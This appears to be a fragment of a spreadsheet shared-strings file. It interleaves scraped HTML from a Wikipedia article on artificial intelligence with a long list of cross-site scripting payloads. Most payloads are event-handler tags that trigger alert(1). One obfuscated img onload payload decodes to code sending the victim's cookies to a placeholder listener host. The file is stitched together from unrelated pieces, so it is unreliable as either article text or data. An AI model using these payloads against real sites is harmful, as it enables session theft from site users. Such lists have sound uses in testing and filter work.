    <t xml:space="preserve">&lt;li&gt;&lt;span class="nowrap"&gt;&lt;a href="/wiki/Integrated_Authority_File" title="Integrated Authority File"&gt;GND &lt;/a&gt;: &lt;span class="uid"&gt;&lt;a rel="nofollow" class="external text" href="https://d-nb.info/gnd/4033447-8"&gt;4033447-8 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;output id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/output&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;center onkeydown="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>echo('IPT&gt;alert("")&lt;/SCRIPT&gt;')</t>
  </si>
  <si>
    <t>&lt;ul oncut="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;header draggable="true" ondrag="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Bayesian_decision_networks-210"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Bayesian_decision_networks_210-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. Brussels: European Commission. 2020. p.&amp;#160;1. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=White+Paper%3A+On+Artificial+Intelligence+-+A+European+approach+to+excellence+and+trust&amp;amp;rft.place=Brussels&amp;amp;rft.pages=1&amp;amp;rft.pub=European+Commission&amp;amp;rft.date=2020&amp;amp;rft_id=https%3A%2F%2Fec.europa.eu%2Finfo%2Fsites%2Finfo%2Ffiles%2Fcommission-white-paper-artificial-intelligence-feb2020_en.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;&lt;sup class="noprint Inline-Template" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citing_sources" title="Wikipedia:Citing sources"&gt;&lt;span title="This citation requires a reference to the specific page or range of pages in which the material appears. (February 2011)"&gt;page&amp;#160;needed </t>
  </si>
  <si>
    <t>&lt;button onblur=alert(1) id=x&gt;&lt;/button&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerdown=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;figure onclick="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Personal_knowledge_base" title="Personal knowledge base"&gt;Personal knowledge base &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;font ondrop=alert(1) contenteditable&gt;drop here&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;hgroup ondragover=alert(1) contenteditable&gt;drop here&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;nav oncontextmenu="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onmouseup="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerenter=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;applet ondblclick="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onbeforepaste="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;p onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/p&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;sup id="cite_ref-FOOTNOTEEdelson1991_141-0" class="reference"&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Hierarchical_control_system" title="Hierarchical control system"&gt;Hierarchical control system &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Artificial_intelligence_in_fiction" title="Artificial intelligence in fiction"&gt;Artificial intelligence in fiction &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jay_Wright_Forrester" title="Jay Wright Forrester"&gt;Jay Wright Forrester &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Galvan, Jill (1 January 1997). "Entering the Posthuman Collective in Philip K. Dick's "Do Androids Dream of Electric Sheep?&lt;span class="cs1-kern-right"&gt;" </t>
  </si>
  <si>
    <t>&lt;p&gt;This includes &lt;a href="/wiki/Embodied_agent" title="Embodied agent"&gt;embodied &lt;/a&gt;, &lt;a href="/wiki/Situated" title="Situated"&gt;situated &lt;/a&gt;, &lt;a href="/wiki/Behavior-based_AI" class="mw-redirect" title="Behavior-based AI"&gt;behavior-based &lt;/a&gt;, and &lt;a href="/wiki/Nouvelle_AI" title="Nouvelle AI"&gt;nouvelle AI &lt;/a&gt;. Researchers from the related field of &lt;a href="/wiki/Robotics" title="Robotics"&gt;robotics &lt;/a&gt;, such as &lt;a href="/wiki/Rodney_Brooks" title="Rodney Brooks"&gt;Rodney Brooks &lt;/a&gt;, rejected symbolic AI and focused on the basic engineering problems that would allow robots to move and survive.&lt;sup id="cite_ref-Embodied_AI_167-0" class="reference"&gt;&lt;a href="#cite_note-Embodied_AI-167"&gt;&amp;#91;164&amp;#93; &lt;/a&gt; &lt;/sup&gt; Their work revived the non-symbolic point of view of the early &lt;a href="/wiki/Cybernetic" class="mw-redirect" title="Cybernetic"&gt;cybernetics &lt;/a&gt; researchers of the 1950s and reintroduced the use of &lt;a href="/wiki/Control_theory" title="Control theory"&gt;control theory &lt;/a&gt; in AI. This coincided with the development of the &lt;a href="/wiki/Embodied_mind_thesis" class="mw-redirect" title="Embodied mind thesis"&gt;embodied mind thesis &lt;/a&gt; in the related field of &lt;a href="/wiki/Cognitive_science" title="Cognitive science"&gt;cognitive science &lt;/a&gt;: the idea that aspects of the body (such as movement, perception and visualization) are required for higher intelligence.</t>
  </si>
  <si>
    <t>&lt;strong onmouseover="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;div id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;param id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/email.html"&gt;Sending e-mail&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rt id=x tabindex=1 onactivate=alert(1)&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;dt onkeydown="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;rt onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/rt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;header onmouseout="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;option draggable="true" ondrag="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;em oncopy="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Sutskever, Ilya; Vinyals, Oriol; Le, Quoc V. (2014). "Sequence to Sequence Learning with Neural Networks". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1409.3215"&gt;1409.3215 &lt;/a&gt; </t>
  </si>
  <si>
    <t>top[“al”+”ert”](1)</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Read webpage data that is loaded dynamically.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=66" title="Edit section: Technological singularity"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Memex" title="Memex"&gt;Memex &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;a id=x tabindex=1 onactivate=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;style style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;div onkeydown="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerdown=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;body onkeyup="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=76" title="Edit section: Further reading"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1972) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;picture onpointerleave=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Programming_language_theory" title="Programming language theory"&gt;Software notations &lt;/a&gt;&lt;br /&gt;and &lt;a href="/wiki/Programming_tool" title="Programming tool"&gt;tools &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmouseup="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;details onpaste="alert(1)" contenteditable&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onmouseleave="alert(1)"&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dt ondragover=alert(1) contenteditable&gt;drop here&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerover=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;rt id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;section ondrop=alert(1) contenteditable&gt;drop here&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; on 25 July 2004. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=4-D%2FRCS%3A+A+Reference+Model+Architecture+for+Intelligent+Unmanned+Ground+Vehicles&amp;amp;rft.btitle=Proceedings+of+the+SPIE+AeroSense+Session+on+Unmanned+Ground+Vehicle+Technology&amp;amp;rft.series=Unmanned+Ground+Vehicle+Technology+IV&amp;amp;rft.pages=11-20&amp;amp;rft.date=2002&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.15.14&amp;amp;rft_id=info%3Adoi%2F10.1117%2F12.474462&amp;amp;rft_id=info%3Abibcode%2F2002SPIE.4715..303A&amp;amp;rft.aulast=Albus&amp;amp;rft.aufirst=J.+S.&amp;amp;rft_id=http%3A%2F%2Fwww.isd.mel.nist.gov%2Fdocuments%2Falbus%2F4DRCS.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 onactivate=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-The_mathematical_objection-357"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-The_mathematical_objection_357-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dd oncopy="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;summary ondrop=alert(1) contenteditable&gt;drop here&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation magazine"&gt;Schank, Roger C. (1991). "Where's the AI". &lt;i&gt;AI magazine &lt;/i&gt;. Vol.&amp;#160;12 no.&amp;#160;4. p.&amp;#160;38. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=AI+magazine&amp;amp;rft.atitle=Where%27s+the+AI&amp;amp;rft.volume=12&amp;amp;rft.issue=4&amp;amp;rft.pages=38&amp;amp;rft.date=1991&amp;amp;rft.aulast=Schank&amp;amp;rft.aufirst=Roger+C.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFHowe1994"&gt;Howe 1994 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;select draggable="true" ondragstart="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;ins onload=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onmouseup="alert(1)"&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onkeypress="alert(1)" contenteditable&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_construction" title="Software construction"&gt;Software construction &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;template id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/template&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Satplan" title="Satplan"&gt;Satplan &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-102"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-102"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;table id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;option ondragover=alert(1) contenteditable&gt;drop here&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;kbd oncopy="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset draggable="true" ondrag="alert(1)"&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;p onpointermove=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;noframes id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/samp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerenter=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpointerleave=alert(1)&gt;XSS&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerout=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;meter onbeforecut="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;744–748, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;video onmouseup="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;shadow draggable="true" ondragstart="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>AI in early science fiction.</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dfn&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFLangley2011"&gt;Langley 2011 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;section onpointerenter=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;param draggable="true" ondragend="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;u onpointermove=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Observation" title="Observation"&gt;Observation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Enterprise_information_system" title="Enterprise information system"&gt;Enterprise information system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p oncontextmenu="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpaste="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-299"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-299"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;base onpointerleave=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/nextid&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Logic_in_computer_science" title="Logic in computer science"&gt;Logic &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onkeypress="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Maleyka_Abbaszadeh" title="Maleyka Abbaszadeh"&gt;Maleyka Abbaszadeh &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;rp id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;slot id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFButler1863"&gt;Butler 1863 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_artificial_intelligence" title="Philosophy of artificial intelligence"&gt;Philosophy of artificial intelligence &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Philosophy_of_information" title="Philosophy of information"&gt;information &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Philosophy_of_perception" title="Philosophy of perception"&gt;perception &lt;/a&gt;&amp;#160;/&amp;#32;&lt;a href="/wiki/Philosophy_of_self" title="Philosophy of self"&gt;self &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robotics_suite" title="Robotics suite"&gt;Suite &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-233"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-233"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;animatetransform onpointermove=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Lieto, Antonio; Lebiere, Christian; Oltramari, Alessandro (May 2018). "The knowledge level in cognitive architectures: Current limitations and possibile developments". &lt;i&gt;Cognitive Systems Research &lt;/i&gt;. &lt;b&gt;48 &lt;/b&gt;: 39–55. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.cogsys.2017.05.001"&gt;10.1016/j.cogsys.2017.05.001 &lt;/a&gt;. &lt;a href="/wiki/Handle_System" title="Handle System"&gt;hdl &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="//hdl.handle.net/2318%2F1665207"&gt;2318/1665207 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cognitive+Systems+Research&amp;amp;rft.atitle=The+knowledge+level+in+cognitive+architectures%3A+Current+limitations+and+possibile+developments&amp;amp;rft.volume=48&amp;amp;rft.pages=39-55&amp;amp;rft.date=2018-05&amp;amp;rft_id=info%3Ahdl%2F2318%2F1665207&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.cogsys.2017.05.001&amp;amp;rft.aulast=Lieto&amp;amp;rft.aufirst=Antonio&amp;amp;rft.au=Lebiere%2C+Christian&amp;amp;rft.au=Oltramari%2C+Alessandro&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;sup id="cite_ref-FOOTNOTETaoTan2005_142-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTETaoTan2005-142"&gt;&amp;#91;139&amp;#93; &lt;/a&gt; &lt;/sup&gt; Moderate successes related to affective computing include textual &lt;a href="/wiki/Sentiment_analysis" title="Sentiment analysis"&gt;sentiment analysis &lt;/a&gt; and, more recently, multimodal affect analysis (see &lt;a href="/wiki/Multimodal_sentiment_analysis" title="Multimodal sentiment analysis"&gt;multimodal sentiment analysis &lt;/a&gt;), wherein AI classifies the affects displayed by a videotaped subject.&lt;sup id="cite_ref-143" class="reference"&gt;&lt;a href="#cite_note-143"&gt;&amp;#91;140&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;mark ondblclick="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;summary onbeforepaste="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerdown=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;figcaption id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;link onmouseenter="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-149" class="reference"&gt;&lt;a href="#cite_note-149"&gt;&amp;#91;146&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;title onbeforecopy="alert(1)" contenteditable&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>Technology &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;bdo id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>Can intelligent behavior be described using simple, elegant principles (such as &lt;a href="/wiki/Logic" title="Logic"&gt;logic &lt;/a&gt; or &lt;a href="/wiki/Optimization_(mathematics)" class="mw-redirect" title="Optimization (mathematics)"&gt;optimization &lt;/a&gt;)? Or does it necessarily require solving a large number of completely unrelated problems?&lt;sup id="cite_ref-Neats_vs._scruffies_17-1" class="reference"&gt;&lt;a href="#cite_note-Neats_vs._scruffies-17"&gt;&amp;#91;17&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ins onmousemove="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;rt oncontextmenu="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dir ondragover=alert(1) contenteditable&gt;drop here&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;colgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;a oncut="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;big onbeforecopy="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;script type="text/javascript"&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/figcaption&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/plaintext&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointermove=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLighthill1973" class="citation book"&gt;&lt;a href="/wiki/James_Lighthill" title="James Lighthill"&gt;Lighthill, James &lt;/a&gt; (1973). "Artificial Intelligence: A General Survey". &lt;i&gt;Artificial Intelligence: a paper symposium &lt;/i&gt;. Science Research Council. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Artificial+Intelligence%3A+A+General+Survey&amp;amp;rft.btitle=Artificial+Intelligence%3A+a+paper+symposium&amp;amp;rft.pub=Science+Research+Council&amp;amp;rft.date=1973&amp;amp;rft.aulast=Lighthill&amp;amp;rft.aufirst=James&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdi onmouseleave="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;big onmousemove="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;data id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>Uncertain reasoning:</t>
  </si>
  <si>
    <t>&lt;rp onmouseup="alert(1)"&gt;test&lt;/rp&gt;</t>
